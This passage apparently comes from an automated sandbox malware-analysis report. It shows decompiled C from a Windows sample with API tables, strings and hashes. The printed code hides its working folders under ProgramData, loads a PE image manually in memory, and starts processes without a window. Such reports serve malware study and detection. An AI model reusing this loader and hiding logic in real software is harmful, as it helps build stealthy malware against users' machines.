						asm("sbb eax, eax");
						return  ~( ~_t65);
					}
				}
				_t72 = E00401AF6( &_v724,  &_v204, _a4);
				_t98 = _t98 + 0xc;
				if(_t72 == 0) {
					goto L3;
				}
				goto L2;
			}

0x00401b68
0x00401b80
0x00401b87
0x00401b89
0x00401b95
0x00401b9c
0x00401b9e
0x00401ba0
0x00401bab
0x00401bb4
0x00401bb6
0x00401bca
0x00401bdd
0x00401be9
0x00401c04
0x00401c06
0x00401c19
0x00401c40
0x00401c53
0x00401c70
0x00401c38
0x00401c3a
0x00000000
0x00401c8f
0x00401c97
0x00401cb2
0x00401cbf
0x00401cc4
0x00401cd6
0x00401ce0
0x00000000
0x00401ce2
0x00401c70
0x00401c2c
0x00401c31
0x00401c36
0x00000000
0x00000000
0x00000000

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,0040F8AC,000000FF,?,00000063), ref: 00401BCA
GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00401BDD
swprintf.MSVCRT(?,%s\ProgramData,?), ref: 00401C04
GetFileAttributesW.KERNEL32(?), ref: 00401C10
swprintf.MSVCRT(?,%s\Intel,?), ref: 00401C53
GetTempPathW.KERNEL32(00000104,?), ref: 00401C97
wcsrchr.MSVCRT(?,0000005C), ref: 00401CAC
wcsrchr.MSVCRT(?,0000005C), ref: 00401CBD

Part of subcall function 00401AF6: CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B07
Part of subcall function 00401AF6: SetCurrentDirectoryW.KERNEL32(?), ref: 00401B12
Part of subcall function 00401AF6: CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B1E
Part of subcall function 00401AF6: SetCurrentDirectoryW.KERNEL32(?), ref: 00401B21

Strings

%s\Intel, xrefs: 00401C4D
%s\ProgramData, xrefs: 00401BFE

Memory Dump Source

Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: Directory$CreateCurrentswprintfwcsrchr$AttributesByteCharFileMultiPathTempWideWindows
String ID: %s\Intel$%s\ProgramData
API String ID: 3806094219-198707228
Opcode ID: e04e666ac5ff563214b472014ed4c30e25de200c4a7bf1775954a8b15fda063a
Instruction ID: 4ac525b1174630586dc3f01422198d44c3eaba501bd80531e66e43f198221a67
Opcode Fuzzy Hash: e04e666ac5ff563214b472014ed4c30e25de200c4a7bf1775954a8b15fda063a
Instruction Fuzzy Hash: 2C41447294021DAAEF609BA0DD45FDA777CAF04310F1045BBE608F71E0EA74DA888F59

Uniqueness

Uniqueness Score: -1.00%

Function 004021E9 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 233
memoryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E004021E9(void* _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, void* _a32) {
				signed int _v8;
				intOrPtr _v40;
				char _v44;
				void* _t82;
				struct HINSTANCE__* _t83;
				intOrPtr* _t84;
				intOrPtr _t89;
				void* _t91;
				void* _t104;
				void _t107;
				intOrPtr _t116;
				intOrPtr _t124;
				signed int _t125;
				signed char _t126;
				intOrPtr _t127;
				signed int _t134;
				intOrPtr* _t145;
				signed int _t146;
				intOrPtr* _t151;
				intOrPtr _t152;
				short* _t153;
				signed int _t155;
				void* _t156;
				intOrPtr _t157;
				void* _t158;
				void* _t159;
				void* _t160;

				_v8 = _v8 & 0x00000000;
				_t3 =  &_a8; // 0x40213f
				if(E00402457( *_t3, 0x40) == 0) {
					L37:
					return 0;
				}
				_t153 = _a4;
				if( *_t153 == 0x5a4d) {
					if(E00402457(_a8,  *((intOrPtr*)(_t153 + 0x3c)) + 0xf8) == 0) {
						goto L37;
					}
					_t151 =  *((intOrPtr*)(_t153 + 0x3c)) + _t153;
					if( *_t151 != 0x4550 ||  *((short*)(_t151 + 4)) != 0x14c) {
						goto L2;
					} else {
						_t9 = _t151 + 0x38; // 0x68004021
						_t126 =  *_t9;
						if((_t126 & 0x00000001) != 0) {
							goto L2;
						}
						_t12 = _t151 + 0x14; // 0x4080e415
						_t13 = _t151 + 6; // 0x4080e0
						_t146 =  *_t13 & 0x0000ffff;
						_t82 = ( *_t12 & 0x0000ffff) + _t151 + 0x18;
						if(_t146 <= 0) {
							L16:
							_t83 = GetModuleHandleA("kernel32.dll");
							if(_t83 == 0) {
								goto L37;
							}
							_t84 = _a24(_t83, "GetNativeSystemInfo", 0);
							_t159 = _t158 + 0xc;
							if(_t84 == 0) {
								goto L37;
							}
							 *_t84( &_v44);
							_t86 = _v40;
							_t23 = _t151 + 0x50; // 0xec8b55c3
							_t25 = _t86 - 1; // 0xec8b55c2
							_t27 = _t86 - 1; // -1
							_t134 =  !_t27;
							_t155 =  *_t23 + _t25 & _t134;
							if(_t155 != (_v40 + _v8 - 0x00000001 & _t134)) {
								goto L2;
							}
							_t31 = _t151 + 0x34; // 0x85680040
							_t89 = _a12( *_t31, _t155, 0x3000, 4, _a32);
							_t127 = _t89;
							_t160 = _t159 + 0x14;
							if(_t127 != 0) {
								L21:
								_t91 = HeapAlloc(GetProcessHeap(), 8, 0x3c);
								_t156 = _t91;
								if(_t156 != 0) {
									 *((intOrPtr*)(_t156 + 4)) = _t127;
									_t38 = _t151 + 0x16; // 0xc3004080
									 *(_t156 + 0x14) =  *_t38 >> 0x0000000d & 0x00000001;
									 *((intOrPtr*)(_t156 + 0x1c)) = _a12;
									 *((intOrPtr*)(_t156 + 0x20)) = _a16;
									 *((intOrPtr*)(_t156 + 0x24)) = _a20;
									 *((intOrPtr*)(_t156 + 0x28)) = _a24;
									 *((intOrPtr*)(_t156 + 0x2c)) = _a28;
									 *((intOrPtr*)(_t156 + 0x30)) = _a32;
									 *((intOrPtr*)(_t156 + 0x38)) = _v40;
									_t54 = _t151 + 0x54; // 0x8328ec83
									if(E00402457(_a8,  *_t54) == 0) {
										L36:
										E004029CC(_t156);
										goto L37;
									}
									_t57 = _t151 + 0x54; // 0x8328ec83
									_t104 = _a12(_t127,  *_t57, 0x1000, 4, _a32);
									_t59 = _t151 + 0x54; // 0x8328ec83
									_a32 = _t104;
									memcpy(_t104, _a4,  *_t59);
									_t107 =  *((intOrPtr*)(_a4 + 0x3c)) + _a32;
									 *_t156 = _t107;
									 *((intOrPtr*)(_t107 + 0x34)) = _t127;
									if(E00402470(_a4, _a8, _t151, _t156) == 0) {
										goto L36;
									}
									_t68 = _t151 + 0x34; // 0x85680040
									_t111 =  *((intOrPtr*)( *_t156 + 0x34)) ==  *_t68;
									if( *((intOrPtr*)( *_t156 + 0x34)) ==  *_t68) {
										_t152 = 1;
										 *((intOrPtr*)(_t156 + 0x18)) = _t152;
									} else {
										 *((intOrPtr*)(_t156 + 0x18)) = E00402758(_t156, _t111);
										_t152 = 1;
									}
									if(E004027DF(_t156) != 0 && E0040254B(_t156) != 0 && E0040271D(_t156) != 0) {
										_t116 =  *((intOrPtr*)( *_t156 + 0x28));
										if(_t116 == 0) {
											 *((intOrPtr*)(_t156 + 0x34)) = 0;
											L41:
											return _t156;
										}
										if( *(_t156 + 0x14) == 0) {
											 *((intOrPtr*)(_t156 + 0x34)) = _t116 + _t127;
											goto L41;
										}
										_push(0);
										_push(_t152);
										_push(_t127);
										if( *((intOrPtr*)(_t116 + _t127))() != 0) {
											 *((intOrPtr*)(_t156 + 0x10)) = _t152;
											goto L41;
										}
										SetLastError(0x45a);
									}
									goto L36;
								}
								_a16(_t127, _t91, 0x8000, _a32);
								L23:
								SetLastError(0xe);
								L3:
								goto L37;
							}
							_t127 = _a12(_t89, _t155, 0x3000, 4, _a32);
							_t160 = _t160 + 0x14;
							if(_t127 == 0) {
								goto L23;
							}
							goto L21;
						}
						_t145 = _t82 + 0xc;
						do {
							_t157 =  *((intOrPtr*)(_t145 + 4));
							_t124 =  *_t145;
							if(_t157 != 0) {
								_t125 = _t124 + _t157;
							} else {
								_t125 = _t124 + _t126;
							}
							if(_t125 > _v8) {
								_v8 = _t125;
							}
							_t145 = _t145 + 0x28;
							_t146 = _t146 - 1;
						} while (_t146 != 0);
						goto L16;
					}
				}
				L2:
				SetLastError(0xc1);
				goto L3;
			}

0x004021ef
0x004021f8
0x00402204
0x0040243d
0x00000000
0x0040243d
0x0040220a
0x00402212
0x00402239
0x00000000
0x00000000
0x00402242
0x0040224a
0x00000000
0x00402254
0x00402254
0x00402254
0x0040225a
0x00000000
0x00000000
0x0040225c
0x00402260
0x00402260
0x00402266
0x0040226a
0x0040228c
0x00402291
0x00402299
0x00000000
0x00000000
0x004022a7
0x004022aa
0x004022af
0x00000000
0x00000000
0x004022b9
0x004022bb
0x004022be
0x004022c1
0x004022c8
0x004022cb
0x004022d1
0x004022d7
0x00000000
0x00000000
0x004022e8
0x004022eb
0x004022ee
0x004022f0
0x004022f5
0x0040230f
0x0040231a
0x00402320
0x00402324
0x0040233d
0x00402340
0x0040234a
0x00402350
0x00402356
0x0040235c
0x00402362
0x00402368
0x0040236e
0x00402374
0x00402377
0x00402386
0x00402436
0x00402437
0x00000000
0x0040243c
0x00402396
0x0040239a
0x0040239d
0x004023a0
0x004023a7
0x004023ba
0x004023bc
0x004023bf
0x004023cc
0x00000000
0x00000000
0x004023d3
0x004023d3
0x004023d6
0x004023eb
0x004023ec
0x004023d8
0x004023e0
0x004023e6
0x004023e6
0x004023f8
0x00402414
0x00402419
0x0040244d
0x00402450
0x00000000
0x00402450
0x0040241e
0x00402448
0x00000000
0x00402448
0x00402420
0x00402421
0x00402424
0x00402429
0x00402441
0x00000000
0x00402441
0x00402430
0x00402430
0x00000000
0x004023f8
0x00402330
0x00402336
0x00402219
0x00402219
0x00000000
0x00402219
0x00402306
0x00402308
0x0040230d
0x00000000
0x00000000
0x00000000
0x0040230d
0x0040226c
0x0040226f
0x0040226f
0x00402272
0x00402276
0x0040227c
0x00402278
0x00402278
0x00402278
0x00402281
0x00402283
0x00402283
0x00402286
0x00402289
0x00402289
0x00000000
0x0040226f
0x0040224a
0x00402214
0x00402219
0x00000000

APIs

Part of subcall function 00402457: SetLastError.KERNEL32(0000000D,00402200,?!@,00000040,?,0000DDB6,?,00402185,0040216E,00402185,00402198,004021A3,004021B2,00000000,0040213F,00000000), ref: 00402463

SetLastError.KERNEL32(000000C1,?,0000DDB6,?,00402185,0040216E,00402185,00402198,004021A3,004021B2,00000000,0040213F,00000000), ref: 00402219
GetModuleHandleA.KERNEL32(kernel32.dll,?,0000DDB6,?,00402185,0040216E,00402185,00402198,004021A3,004021B2,00000000,0040213F,00000000), ref: 00402291
GetProcessHeap.KERNEL32(00000008,0000003C,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3,004021B2), ref: 00402313
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3,004021B2,00000000), ref: 0040231A
memcpy.MSVCRT(00000000,?,8328EC83,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3), ref: 004023A7

Part of subcall function 00402470: memset.MSVCRT(?,00000000,?), ref: 004024D5

SetLastError.KERNEL32(0000045A), ref: 00402430

Strings

kernel32.dll, xrefs: 0040228C
GetNativeSystemInfo, xrefs: 004022A1
?!@, xrefs: 004021F8

Memory Dump Source

Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: ErrorLast$Heap$AllocHandleModuleProcessmemcpymemset
String ID: ?!@$GetNativeSystemInfo$kernel32.dll
API String ID: 1900561814-3657104962
Opcode ID: 0e24c0e50799aa35dd9f5fcc36a4565fcb8133d83dc7aa1daf15d2422d00f892
Instruction ID: 3b750285519b5b92c664dbe57bf04ddc7e4262fbacbc213f0015b22f99412f1c
Opcode Fuzzy Hash: 0e24c0e50799aa35dd9f5fcc36a4565fcb8133d83dc7aa1daf15d2422d00f892
Instruction Fuzzy Hash: 0A81AD71A01602AFDB209FA5CE49AAB77E4BF08314F10443EF945E76D1D7B8E851CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401AF6 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00401AF6(WCHAR* _a4, WCHAR* _a8, wchar_t* _a12) {
				void* _t15;
				WCHAR* _t17;

				CreateDirectoryW(_a4, 0);
				if(SetCurrentDirectoryW(_a4) == 0) {
					L2:
					return 0;
				}
				_t17 = _a8;
				CreateDirectoryW(_t17, 0);
				if(SetCurrentDirectoryW(_t17) != 0) {
					SetFileAttributesW(_t17, GetFileAttributesW(_t17) | 0x00000006);
					if(_a12 != 0) {
						_push(_t17);
						swprintf(_a12, L"%s\\%s", _a4);
					}
					_t15 = 1;
					return _t15;
				}
				goto L2;
			}

0x00401b07
0x00401b16
0x00401b27
0x00000000
0x00401b27
0x00401b18
0x00401b1e
0x00401b25
0x00401b36
0x00401b40
0x00401b42
0x00401b4e
0x00401b54
0x00401b59
0x00000000
0x00401b59
0x00000000

APIs

CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B07
SetCurrentDirectoryW.KERNEL32(?), ref: 00401B12
CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B1E
SetCurrentDirectoryW.KERNEL32(?), ref: 00401B21
GetFileAttributesW.KERNEL32(?), ref: 00401B2C
SetFileAttributesW.KERNEL32(?,00000000), ref: 00401B36
swprintf.MSVCRT(?,%s\%s,?,?), ref: 00401B4E

Strings

%s\%s, xrefs: 00401B46

Memory Dump Source

Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: Directory$AttributesCreateCurrentFile$swprintf
String ID: %s\%s
API String ID: 1036847564-4073750446
Opcode ID: e8d223ccc4edc92c4536f1ca202ba6161fd040db7272db682552e70b0b18d917
Instruction ID: 4a0a9b6f0974b2b783bf1fd4f993800d593798a72c4fd06372b86497b3864b36
Opcode Fuzzy Hash: e8d223ccc4edc92c4536f1ca202ba6161fd040db7272db682552e70b0b18d917
Instruction Fuzzy Hash: 99F06271200208BBEB103F65DE44F9B3B2CEB457A5F015832FA46B61A1DB75A855CAB8

Uniqueness

Uniqueness Score: -1.00%

Function 00401064 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63
processsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00401064(CHAR* _a4, long _a8, DWORD* _a12) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOA _v88;
				signed int _t32;
				intOrPtr _t37;

				_t32 = 0x10;
				_v88.cb = 0x44;
				memset( &(_v88.lpReserved), 0, _t32 << 2);
				_v20.hProcess = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t37 = 1;
				_v88.wShowWindow = 0;
				_v88.dwFlags = _t37;
				if(CreateProcessA(0, _a4, 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20) == 0) {
					return 0;
				}
				if(_a8 != 0) {
					if(WaitForSingleObject(_v20.hProcess, _a8) != 0) {
						TerminateProcess(_v20.hProcess, 0xffffffff);
					}
					if(_a12 != 0) {
						GetExitCodeProcess(_v20.hProcess, _a12);
					}
				}
				CloseHandle(_v20);
				CloseHandle(_v20.hThread);
				return _t37;
			}

0x00401070
0x00401074
0x0040107d
0x00401082
0x00401085
0x00401086
0x00401087
0x0040108d
0x0040108e
0x004010a1
0x004010b0
0x00000000
0x004010f7
0x004010b5
0x004010c5
0x004010cc
0x004010cc
0x004010d5
0x004010dd
0x004010dd
0x004010d5
0x004010ec
0x004010f1
0x00000000

APIs

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 004010A8
WaitForSingleObject.KERNEL32(?,?), ref: 004010BD
TerminateProcess.KERNEL32(?,000000FF), ref: 004010CC
GetExitCodeProcess.KERNEL32(?,?), ref: 004010DD
CloseHandle.KERNEL32(?), ref: 004010EC
CloseHandle.KERNEL32(?), ref: 004010F1

Strings

D, xrefs: 00401074

Memory Dump Source

Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: Process$CloseHandle$CodeCreateExitObjectSingleTerminateWait
String ID: D
API String ID: 786732093-2746444292
Opcode ID: 520ef4afec62fe4405832db260c3c6b21caa087d375fb1c1d919acb3a27097cb
Instruction ID: fabf2a0aaa91e867d54492d1ca24e81fc8ed090543e33b3e61fa812da4358066
Opcode Fuzzy Hash: 520ef4afec62fe4405832db260c3c6b21caa087d375fb1c1d919acb3a27097cb
Instruction Fuzzy Hash: 8D116431900229ABDB218F9ADD04ADFBF79FF04720F008426F514B65A0DB708A18DAA8

Uniqueness

Uniqueness Score: -1.00%

Function 004077BA Relevance: 12.1, APIs: 8, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 81%

			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				intOrPtr* _t23;
				intOrPtr* _t24;
				void* _t27;
				void _t29;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				intOrPtr _t61;

				_push(0xffffffff);
				_push(0x40d488);
				_push(0x4076f4);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_v28 = _t58 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x40f94c =  *0x40f94c | 0xffffffff;
				 *0x40f950 =  *0x40f950 | 0xffffffff;
				_t23 = __p__fmode();
				_t46 =  *0x40f948; // 0x0
				 *_t23 = _t46;
				_t24 = __p__commode();
				_t47 =  *0x40f944; // 0x0
				 *_t24 = _t47;
				 *0x40f954 = _adjust_fdiv;
				_t27 = E0040793F( *_adjust_fdiv);
				_t61 =  *0x40f870; // 0x1
				if(_t61 == 0) {
					__setusermatherr(E0040793C);
				}
				E0040792A(_t27);
				_push(0x40e00c);
				_push(0x40e008);
				L00407924();
				_t29 =  *0x40f940; // 0x0
				_v112 = _t29;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x40f93c,  &_v112);
				_push(0x40e004);
				_push(0x40e000);
				L00407924();
				_t55 =  *_acmdln;
				_v120 = _t55;
				if( *_t55 != 0x22) {
					while(1) {
						__eflags =  *_t55 - 0x20;
						if(__eflags <= 0) {
							goto L7;
						}
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						_v120 = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				}
				L7:
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				_t69 = _v96.dwFlags & 0x00000001;
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_t40 = L00401FE7(_t69, GetModuleHandleA(0), 0, _t55, _t38);
				_v108 = _t40;
				exit(_t40);
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L0040791E();
				return _t41;
			}

0x004077bd
0x004077bf
0x004077c4
0x004077cf
0x004077d0
0x004077dd
0x004077e2
0x004077e7
0x004077ee
0x004077f5
0x004077fc
0x00407802
0x00407808
0x0040780a
0x00407810
0x00407816
0x0040781f
0x00407824
0x00407829
0x0040782f
0x00407836
0x0040783c
0x0040783d
0x00407842
0x00407847
0x0040784c
0x00407851
0x00407856
0x0040786f
0x00407875
0x0040787a
0x0040787f
0x0040788c
0x0040788e
0x00407894
0x004078d0
0x004078d0
0x004078d3
0x00000000
0x00000000
0x004078d5
0x004078d6
0x004078d6
0x00407896
0x00407896
0x00407896
0x00407897
0x0040789a
0x0040789c
0x004078a7
0x004078a9
0x004078a9
0x004078aa
0x004078aa
0x004078a7
0x004078ad
0x004078ad
0x004078b1
0x00000000
0x00000000
0x004078b7
0x004078be
0x004078c4
0x004078c8
0x004078dd
0x004078ca
0x004078ca
0x004078ca
0x004078e9
0x004078ee
0x004078f2
0x004078f8
0x004078fd
0x004078ff
0x00407902
0x00407903
0x00407904
0x0040790b

APIs

__set_app_type.MSVCRT(00000002), ref: 004077E7
__p__fmode.MSVCRT ref: 004077FC
__p__commode.MSVCRT ref: 0040780A
_initterm.MSVCRT(0040E008,0040E00C), ref: 0040784C
__getmainargs.MSVCRT(?,?,?,?,0040E008,0040E00C), ref: 0040786F
_initterm.MSVCRT(0040E000,0040E004), ref: 0040787F

Memory Dump Source

Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: _initterm$__getmainargs__p__commode__p__fmode__set_app_type
String ID:
API String ID: 3626615345-0
Opcode ID: bfbd7971593811c7fff28e35bb39fa0d644f96314b868f8e424e213b276a966c
Instruction ID: 63d29f1c4e41429a3497612c8de1f509d91e94429ea3a2aefb8dc74a018e4fb3
Opcode Fuzzy Hash: bfbd7971593811c7fff28e35bb39fa0d644f96314b868f8e424e213b276a966c
Instruction Fuzzy Hash: 51318BB1D04344AFDB20AFA5DE49F5A7BA8BB05710F10463EF541B72E0CB786805CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00407831 Relevance: 12.1, APIs: 8, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00407831(CHAR* __ebx) {
				void* _t19;
				void _t21;
				intOrPtr _t28;
				signed int _t30;
				int _t32;
				intOrPtr* _t33;
				intOrPtr _t34;
				CHAR* _t35;
				intOrPtr _t38;
				intOrPtr* _t41;
				void* _t42;

				_t35 = __ebx;
				__setusermatherr(E0040793C);
				E0040792A(_t19);
				_push(0x40e00c);
				_push(0x40e008);
				L00407924();
				_t21 =  *0x40f940; // 0x0
				 *(_t42 - 0x6c) = _t21;
				__getmainargs(_t42 - 0x60, _t42 - 0x70, _t42 - 0x64,  *0x40f93c, _t42 - 0x6c);
				_push(0x40e004);
				_push(0x40e000);
				L00407924();
				_t41 =  *_acmdln;
				 *((intOrPtr*)(_t42 - 0x74)) = _t41;
				if( *_t41 != 0x22) {
					while(1) {
						__eflags =  *_t41 - 0x20;
						if(__eflags <= 0) {
							goto L6;
						}
						_t41 = _t41 + 1;
						 *((intOrPtr*)(_t42 - 0x74)) = _t41;
					}
				} else {
					do {
						_t41 = _t41 + 1;
						 *((intOrPtr*)(_t42 - 0x74)) = _t41;
						_t34 =  *_t41;
					} while (_t34 != _t35 && _t34 != 0x22);
					if( *_t41 == 0x22) {
						L5:
						_t41 = _t41 + 1;
						 *((intOrPtr*)(_t42 - 0x74)) = _t41;
					}
				}
				L6:
				_t28 =  *_t41;
				if(_t28 != _t35 && _t28 <= 0x20) {
					goto L5;
				}
				 *(_t42 - 0x30) = _t35;
				GetStartupInfoA(_t42 - 0x5c);
				_t52 =  *(_t42 - 0x30) & 0x00000001;
				if(( *(_t42 - 0x30) & 0x00000001) == 0) {
					_t30 = 0xa;
				} else {
					_t30 =  *(_t42 - 0x2c) & 0x0000ffff;
				}
				_t32 = L00401FE7(_t52, GetModuleHandleA(_t35), _t35, _t41, _t30);
				 *(_t42 - 0x68) = _t32;
				exit(_t32);
				_t33 =  *((intOrPtr*)(_t42 - 0x14));
				_t38 =  *((intOrPtr*)( *_t33));
				 *((intOrPtr*)(_t42 - 0x78)) = _t38;
				_push(_t33);
				_push(_t38);
				L0040791E();
				return _t33;
			}

0x00407831
0x00407836
0x0040783d
0x00407842
0x00407847
0x0040784c
0x00407851
0x00407856
0x0040786f
0x00407875
0x0040787a
0x0040787f
0x0040788c
0x0040788e
0x00407894
0x004078d0
0x004078d0
0x004078d3
0x00000000
0x00000000
0x004078d5
0x004078d6
0x004078d6
0x00407896
0x00407896
0x00407896
0x00407897
0x0040789a
0x0040789c
0x004078a7
0x004078a9
0x004078a9
0x004078aa
0x004078aa
0x004078a7
0x004078ad
0x004078ad
0x004078b1
0x00000000
0x00000000
0x004078b7
0x004078be
0x004078c4
0x004078c8
0x004078dd
0x004078ca
0x004078ca
0x004078ca
0x004078e9
0x004078ee
0x004078f2
0x004078f8
0x004078fd
0x004078ff
0x00407902
0x00407903
0x00407904
0x0040790b

APIs

__setusermatherr.MSVCRT(0040793C), ref: 00407836

Part of subcall function 0040792A: _controlfp.MSVCRT(00010000,00030000,00407842), ref: 00407934

_initterm.MSVCRT(0040E008,0040E00C), ref: 0040784C
__getmainargs.MSVCRT(?,?,?,?,0040E008,0040E00C), ref: 0040786F
_initterm.MSVCRT(0040E000,0040E004), ref: 0040787F
GetStartupInfoA.KERNEL32(?), ref: 004078BE
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004078E2
exit.MSVCRT(00000000,00000000,?,?,?,?), ref: 004078F2
_XcptFilter.MSVCRT(?,?,?,?,?,?), ref: 00407904

Memory Dump Source

Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__setusermatherr_controlfpexit
String ID:
API String ID: 2141228402-0
Opcode ID: e2abdc3946810ebb19c889ba728617f0f692a6676515e3c370649a79fa0f1872
Instruction ID: 738ed170af38765147f9c33b7b7214e7a7d60aeb9597ff7827fffae83538cc25
Opcode Fuzzy Hash: e2abdc3946810ebb19c889ba728617f0f692a6676515e3c370649a79fa0f1872
Instruction Fuzzy Hash: F52135B2C04258AEEB20AFA5DD48AAD7BB8AF05304F24443FF581B7291D7786841CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004027DF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E004027DF(signed int* _a4) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr* _t50;
				intOrPtr _t53;
				intOrPtr _t55;
				void* _t58;
				void _t60;
				signed int _t63;
				signed int _t67;
				intOrPtr _t68;
				void* _t73;
				signed int _t75;
				intOrPtr _t87;
				intOrPtr* _t88;
				intOrPtr* _t90;
				void* _t91;

				_t90 = _a4;
				_t2 = _t90 + 4; // 0x4be8563c
				_t87 =  *_t2;
				_t50 =  *_t90 + 0x80;
				_t75 = 1;
				_v16 = _t87;
				_v12 = _t75;
				if( *((intOrPtr*)(_t50 + 4)) != 0) {
					_t73 =  *_t50 + _t87;
					if(IsBadReadPtr(_t73, 0x14) != 0) {
						L25:
						return _v12;
					}
					while(1) {
						_t53 =  *((intOrPtr*)(_t73 + 0xc));
						if(_t53 == 0) {
							goto L25;
						}
						_t8 = _t90 + 0x30; // 0xc085d0ff
						_t55 =  *((intOrPtr*)(_t90 + 0x24))(_t53 + _t87,  *_t8);
						_v8 = _t55;
						if(_t55 == 0) {
							SetLastError(0x7e);
							L23:
							_v12 = _v12 & 0x00000000;
							goto L25;
						}
